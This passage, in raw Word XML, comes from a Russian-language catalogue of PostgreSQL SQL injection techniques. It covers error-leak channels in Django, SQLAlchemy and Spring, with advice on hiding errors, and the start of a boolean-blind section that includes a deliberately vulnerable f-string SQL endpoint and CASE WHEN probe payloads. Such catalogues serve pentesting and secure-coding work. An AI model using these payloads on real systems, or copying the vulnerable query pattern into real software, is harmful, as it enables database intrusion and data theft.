      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQLAlchemy: ловить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DBAPIError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, логировать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>str(exc)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на сервере, клиенту возвращать обобщённое </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{"error": "Internal server error", "request_id": "..."}</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00518DCA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Spring: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server.error.include-message=never</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>include-stacktrace=never</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B92977" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Конкретные сигналы того, что канал открыт:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0178A515" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP-ответ 500 содержит строки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Traceback (most recent call last):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>psycopg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sqlalchemy.exc.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>org.postgresql.util.PSQLException</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C61D93E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В JSON-ответе при ошибке присутствует поле с полным SQL-запросом или подстрокой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>invalid input syntax for type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>relation ... does not exist</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D7E55C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DEBUG=True</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>settings.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> коммитнут в репозиторий или выставлен в продакшен-окружении.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1586C47E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.2.1, 3.2.2, 3.2.4 (зависят от этого канала), 3.2.3 (не зависит), 5.6 (логирование на сервере).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2CCB3B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Django Documentation: Error reporting; SQLAlchemy: Core Exceptions — DBAPIError; Spring Boot Reference: Server Properties; pgjdbc PSQLException source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477D9A7F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Саммари категории 3.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389CC657" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>3.2.1 Числовые касты — основной канал, любая длина значения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7171C707" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — лимит 63 байта, удобен для коротких leak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ED4610" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN ... 1/0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — работает без проброса текста ошибки, только по HTTP-status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA5AAA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2.4 XML через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — рабочий, но зависит от libxml2 и сборки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2790B684" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>3.2.5 Каналы пробрасывания ошибки (Django/SQLAlchemy/Spring) — без них вся категория, кроме 3.2.3, не работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B6A45E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Использованные источники из research: R19 в полном объёме — PortSwigger cheat sheet, Django docs, SQLAlchemy DBAPIError, Spring Boot config.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACC8FBF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 Boolean-based blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B39E48" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.3.0 Обзор категории</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CBE86D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Boolean-blind применяется, когда приложение не возвращает ни данных, ни текста ошибки, ни видимой задержки — но реагирует на присутствие или отсутствие строк в результате запроса. Главный примитив в PostgreSQL — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, используемый и в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, и в SELECT-листе. В PG нет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IF()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (это MySQL-конструкция, в PG её нет в SQL-режиме), поэтому весь категория-каталог строится на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA0873F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Граница с 3.2.3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Оба паттерна используют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как бинарный oracle, но различаются каналом наблюдения:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F715A12" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2.3 — oracle через различие HTTP-status: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>THEN 1/0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> бросает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>division by zero</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → HTTP 500, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ELSE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> отрабатывает → HTTP 200. Работает, когда приложение глотает текст ошибки, но статус-код различим.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A994ABE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 — oracle через различие содержимого HTTP 200: запрос либо возвращает строки, либо не возвращает; либо одну и ту же строку, либо ничего. Работает, когда статус всегда 200, но body различим.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D52B93" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если приложение возвращает одинаковый HTTP-status и одинаковое body независимо от условия — оба канала закрыты, и техника не работает. Следующая ступень эскалации — 3.4 Time-based blind, использующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в качестве канала наблюдения по времени ответа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF563FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Структура категории. Три подраздела:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A09ECF4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3.1 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как примитив для построения boolean-выражения, фундамент для всего остального.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D412C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3.2 — bit-by-bit extraction через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>substring()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ascii()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с бинарным поиском.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E1105E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3.3 — row-count канал через tautology в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не требующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вообще.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503DC934" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Канал требует, чтобы у атакующего была возможность сделать тысячи запросов (для посимвольного извлечения) — это не атака на один-два HTTP-вызова, это длинный экстракшен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5CAEAC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.3.1 `CASE WHEN` как boolean primitive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A5F413" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN cond THEN a ELSE b END</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — фундаментальный условный примитив PG, возвращающий разные значения в зависимости от истинности </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cond</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54912C7B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606451A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># api/views.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039CA3B9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B41AAF4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114815B4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@app.get("/products/{product_id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157563AC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def get_product(product_id: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537D89B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = f"SELECT id, name, price FROM products WHERE id = {product_id}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1217F45D"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3C065BF1"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5B020351" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return [dict(row) for row in result.mappings()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7746214D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Эндпоинт всегда возвращает HTTP 200 — либо с продуктом, либо с пустым списком. Текст ошибок не пробрасывается. Это и есть классический контекст boolean-blind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58786FDF"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1F68A33E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в скалярном контексте:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4B4437" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT CASE WHEN current_user = 'app_user' THEN 1 ELSE 0 END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E84986B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD821AD"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current_user = 'app_user' THEN 1 ELSE 0 END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2190DDC4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
